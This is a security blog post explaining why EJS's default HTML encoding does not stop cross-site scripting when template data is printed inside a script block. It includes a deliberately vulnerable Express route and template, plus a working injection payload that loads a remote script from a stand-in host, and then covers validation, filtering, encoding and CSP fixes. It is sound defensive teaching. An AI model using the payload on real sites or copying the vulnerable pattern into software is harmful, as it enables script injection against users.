Aug 15, 2018

Node.js Template Engines: Why Default Encoders Are Not Enough

By Bipin Mistry

Escaping is an important security control for preventing cross-site scripting (XSS) in web applications. Escaping is the process of converting certain characters, such as <, >, and quotation marks, into a safe representation (for example, < becomes &lt;). By escaping, you reduce the likelihood of the browser rendering those characters as HTML when it is not supposed to.

OWASP.org provides us with a nice definition:

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

Going forward, we'll refer to escaping as encoding. Encoding is a fancier way of describing the process of converting untrusted characters into a "safe" format.
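To make the idea concrete, here is a minimal sketch of HTML encoding in plain JavaScript. The escapeHtml helper is hypothetical and written only for illustration. It converts the five characters that HTML encoders typically handle, and it is not a substitute for your template engine's own encoder.

```javascript
// Hypothetical helper for illustration: converts the five characters that
// are significant in HTML into character references.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&#34;',
  "'": '&#39;'
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, function (ch) {
    return HTML_ENTITIES[ch];
  });
}

const input = '<script>alert("xss")</script>';
console.log(escapeHtml(input));
// prints: &lt;script&gt;alert(&#34;xss&#34;)&lt;/script&gt;
```

The browser displays the encoded result as literal text instead of treating it as a script tag.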

Template Engines to the Rescue...

Fortunately, several popular Node.js template engines offer encoding syntax so you can avoid a majority of scenarios that lead to XSS vulnerabilities.

Here are some syntax considerations for popular templating frameworks:

Template Engine           Encode output            Allow raw output (no encoding)
EJS                       <%= text goes here %>    <%- text goes here %>
Mustache and Handlebars   {{ text goes here }}     {{{ text goes here }}}
Pug                       #{ text goes here }      !{ text goes here }

In today's post, we'll be using EJS.

Context is King

Despite use of encoding syntax, XSS can still occur. How is this possible?

In this example, we have a Node.js app that uses Express and EJS for templating. Our app takes a user-supplied age (via the age query parameter), determines the correct target date mutual fund on the server side, and prints the fund name to the user (see circle #1 in the image below).

[Image: Blog JS Context Example]

Here’s the Node.js code that selects a mutual fund given a user-supplied age. The code passes three values to the 401k.ejs EJS template:

  • currentAge (which should always be an integer)
  • retireAt (a hard-coded retirement age)
  • selectedFund (a string returned from the determineTargetDateFund() method)
/* --------------------------------
   routes.js
   -------------------------------- */

   app.get('/401k', function(req, res) {

       var currentAge = req.query.age;
       var retireAt = 65;
      
       var selectedFund = determineTargetDateFund(currentAge, retireAt);

       res.render('pages/401k', {
           currentAge: currentAge,
           retireAt: retireAt,
           selectedFund: selectedFund
       });

   });

The template looks like this:

<!--
// 401k.ejs
//-->

<h3>What target date fund should you pick?</h3>

Enter your age:
<form action="/401k" method="GET">
   <input name="age" size="5" value="<%= currentAge %>" onblur="updateYearsAwayFromRetirement(this.value)">
   <input type="submit" value=" Go ">

   <br>

   <span id="yearsAwayFromRetirement" style="font-style: italic"></span>
</form>

<p>&nbsp;</p>

<% if(selectedFund) { %>
   You should select this fund: <span><%= selectedFund %></span>
<% } %>

<script language="javascript">
   //Initialize page with age submitted to server
   updateYearsAwayFromRetirement(<%= currentAge %>)

   function updateYearsAwayFromRetirement(ageValue) {
       retireAt = <%= retireAt %>;
       currentAge = ageValue;

       if(currentAge) {
           document.getElementById('yearsAwayFromRetirement').innerText = retireAt - currentAge + ' years away from retiring at age ' + retireAt;
       }
   }
</script>

Everywhere we print a template variable to the page, we use the EJS encoding syntax: <%= template_variable_goes_here %>.

That's good, but not 100% foolproof.

JavaScript != HTML Context

If you look closely, you'll see the EJS variable currentAge printed as an argument of the JavaScript function updateYearsAwayFromRetirement() at template render time. This is JavaScript context (!)

This function is subsequently called by the browser on page load to calculate the number of years until retirement (circle #2 in the image above). If the user submitted an age of '45', then the page source will look like this:

[Image: Blog Printed Inside JS Context 1]

In general, you should avoid printing template data inside JavaScript context. Even if you are encoding the data, EJS and other template engines will NOT consider all possible contexts - such as the context of a JavaScript function or script block. This behavior means benign characters in an HTML context can be harmful inside a JavaScript context.

Attack Example

To recap, we print the currentAge variable using EJS encoding syntax (<%= %>) in two locations of 401k.ejs:

  1. As an argument inside updateYearsAwayFromRetirement() (JavaScript context)
  2. As the initial value of the "Enter your age" text field (HTML context)

The EJS encoding syntax works great in the HTML context, but fails to prevent XSS attacks in the JavaScript context. For example, consider what happens when you pass the following string into the age query parameter:

45); var s = document.createElement(`script`); s.src = `http://example.com/someEvilScript.js`; document.body.appendChild(s); //

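You'll notice we are using backticks (`). EJS encodes quotation marks, so an attacker cannot use them to build a string, but it leaves backticks alone. In HTML context, backticks are benign and treated as text. However, in JavaScript context, backticks delimit template literals, so they act as string delimiters that pass through the encoder unchanged!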

You'll see the full string appear in the source, and a request to someEvilScript.js in the console!
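The following sketch shows why the payload slips through. It assumes an HTML encoder that converts &, <, >, " and '. The hypothetical escapeHtml function stands in for the template engine's encoder (it is not the EJS source code), and the script line is assembled the same way the template assembles it.

```javascript
// Hypothetical stand-in for an HTML encoder; not the EJS implementation.
function escapeHtml(untrusted) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&#34;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, function (ch) {
    return entities[ch];
  });
}

// The attack string, as it would arrive in req.query.age
const payload = '45); var s = document.createElement(`script`); ' +
  's.src = `http://example.com/someEvilScript.js`; ' +
  'document.body.appendChild(s); //';

const encoded = escapeHtml(payload);

// None of the five HTML-significant characters appear in the payload,
// so HTML encoding leaves it untouched.
console.log(encoded === payload); // prints: true

// What the browser receives inside the <script> block:
const renderedLine = 'updateYearsAwayFromRetirement(' + encoded + ')';
console.log(renderedLine);
```

The rendered line closes the function call early after 45, runs the attacker's statements, and comments out the trailing parenthesis.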

[Image: Blog Injected JS Attack]

[Image: Blog Injected Vulnerable JavaScript]

How to Fix

In all cases, double-check context before you print data to a page. JavaScript context isn't the only "non-HTML" context that the browser interprets. Other contexts, like style tags and comment tags, will require different encoders.
(Read more at the OWASP.org XSS Prevention Cheat Sheet.)

Even though we're allowing EJS to automatically encode output, we need to add additional encoding on the server-side to avoid the attack scenario illustrated above.

In many scenarios, output encoding (i.e., converting unsafe characters into a safe representation before printing them to a page) is the best defense against XSS attacks.
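As an illustration of context-specific encoding, here is one possible sketch of an encoder for values printed inside a script block. The function name encodeForScript is hypothetical. It relies on JSON.stringify to produce a quoted JavaScript literal and additionally escapes <, >, & and the U+2028/U+2029 line separators so the value cannot close the surrounding script tag. The sketch assumes the result is printed as a complete value (not inside another string literal) with the raw output syntax (<%- %>), because HTML encoding applied on top of it would corrupt the quotes.

```javascript
// Hypothetical helper: encodes a value for use as a JavaScript literal
// inside an inline <script> block.
function encodeForScript(value) {
  // JSON.stringify(undefined) returns undefined, so treat it as null
  const json = JSON.stringify(value === undefined ? null : value);
  return json
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const payload = '45); var s = document.createElement(`script`); //';
console.log(encodeForScript(payload));
// prints: "45); var s = document.createElement(`script`); //"
// The payload is now a quoted string literal rather than executable code.

console.log(encodeForScript('</script>'));
// prints: "\u003c/script\u003e"
```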

For the example above, we want to ensure the currentAge variable is always an integer. We can also perform input validation so that the app can reliably calculate the correct mutual fund without invalid characters ever getting in the way.

Input Validation

First, we want to make sure the app properly handles scenarios where non-integer values are passed into the age query parameter.

To do this, we perform input validation on the currentAge variable by verifying the data is an integer and greater than zero.

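/* --------------------------------
   routes.js
   -------------------------------- */

app.get('/401k', function(req, res) {
    var currentAge = req.query.age;
    var retireAt = 65;
    
    //Perform input validation on the currentAge variable.
    //Query parameters arrive as strings (or arrays, or undefined), so we
    //check that the value is a string of digits before comparing it as a number
    if(typeof currentAge === 'string' && /^\d+$/.test(currentAge) && parseInt(currentAge, 10) > 0) {
    
        //continue...
    }else{
    
        //throw error...
    }
});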
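One way to package this check is a small helper that either returns a validated integer or signals failure. The name parseAge and the choice of returning null for invalid input are assumptions made for this sketch; they are not part of the original app.

```javascript
// Hypothetical helper: returns the age as an integer, or null if the raw
// query value is not a string of digits representing a positive number.
function parseAge(rawAge) {
  // A query value may be a string, an array, an object or undefined
  if (typeof rawAge !== 'string' || !/^\d+$/.test(rawAge)) {
    return null;
  }
  const age = parseInt(rawAge, 10);
  return Number.isSafeInteger(age) && age > 0 ? age : null;
}

console.log(parseAge('45'));               // prints: 45
console.log(parseAge('0'));                // prints: null
console.log(parseAge('45); alert(1) //')); // prints: null
console.log(parseAge(undefined));          // prints: null
```

Rejecting the request when the helper returns null keeps malformed input out of both the fund calculation and the template.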

Output Encoding and Filtering

This is the most important step. As I mentioned earlier, encoding is the process of converting untrusted characters into a safe format. Filtering is a bit different and removes untrusted or unwanted characters from the data.

Whenever data is passed to the template engine, output encoding and/or filtering should occur - even if it's just a final sanity check. In our example, we're going to filter the currentAge variable by removing any non-digit characters from it.

/* --------------------------------
   routes.js
   -------------------------------- */

...
res.render('pages/401k', {
    //Removes any characters that are 'not digits'
    //(String() guards against non-string values such as arrays)
    currentAge: String(currentAge || '').replace(/\D/g,''),
    retireAt: retireAt,
    selectedFund: selectedFund
});
...
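Applied to the attack string from earlier, the digit filter behaves as follows. The wrapper name digitsOnly is hypothetical; it uses the same /\D/g replacement as the route code.

```javascript
// Hypothetical wrapper around the digit filter
function digitsOnly(value) {
  return String(value || '').replace(/\D/g, '');
}

const payload = '45); var s = document.createElement(`script`); ' +
  's.src = `http://example.com/someEvilScript.js`; ' +
  'document.body.appendChild(s); //';

console.log(digitsOnly(payload));          // prints: 45
console.log(digitsOnly('4a5'));            // prints: 45
console.log(digitsOnly(undefined) === ''); // prints: true
```

Note that filtering silently changes the input ('4a5' becomes 45), which is one reason to pair it with input validation rather than rely on it alone.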

Recommendations

The above example may manifest itself in web applications with heavy JavaScript front-end architectures. XSS in JavaScript context is not as common as XSS in HTML context, but our example highlights the risk of over-reliance on template engines for security.

Here are a few tips:

  • Understand your context and apply output encoding and/or filtering
  • Avoid printing data in JavaScript context: In our example, we printed data from the server-side directly into JavaScript context. Avoid this whenever possible. If you cannot avoid it, be sure to apply additional output encoding logic on the server-side before passing the data to the template engine.
  • Harden web apps with a Content-Security-Policy: While not a fix for the underlying XSS vulnerability, this configuration can reduce the impact of an XSS attack.
  • Keep business logic in one place: A general best practice. In our example, the retirement calculation ran in the browser while fund selection ran on the server, which is what led us to print server-side data into a script block.
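As a sketch of the Content-Security-Policy tip, the middleware below sets a restrictive policy header on every response. The function name contentSecurityPolicy and the policy value are assumptions chosen for illustration; a real policy has to be tailored to the resources your pages load. Note that a policy without 'unsafe-inline' also blocks inline script blocks such as the one in 401k.ejs, so that script would need to move to an external file.

```javascript
// Hypothetical Express-style middleware (req, res, next signature)
function contentSecurityPolicy(req, res, next) {
  // Example policy: only load resources, including scripts, from our own origin
  res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'");
  next();
}

// Usage in an Express app (assuming `app` is an existing Express application):
// app.use(contentSecurityPolicy);
```

With a policy like this in place, the browser would refuse to load someEvilScript.js from example.com even if an injection succeeded.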



Bipin Mistry is Sr. Director of Product Management for the WAS/IAST product line. Prior to joining Veracode, he was VP of Product Management for NEC/Netcracker in their SDN/NFV and Security business unit. At NEC/Netcracker, Bipin’s primary focus was to develop solutions and architectures specifically mapped to NFV/SDN and Orchestration. He has over 28 years of expertise in Security, Software Architectures, Mobile and Core Networking Technologies, Product Management, Marketing, Engineering and Sales. Prior to joining NEC/Netcracker, Bipin was VP President of Product Management for a security startup in the field of DDoS analysis and mitigation. Bipin has also held architectural and management roles at both Juniper Networks (Chief Mobile Architect) and Cisco Systems (Sr. Director of SP Architecture).

Bipin lives in Shrewsbury, MA with his wife and 2 children. In his spare time, Bipin is a keen runner and is currently attempting to learn Spanish.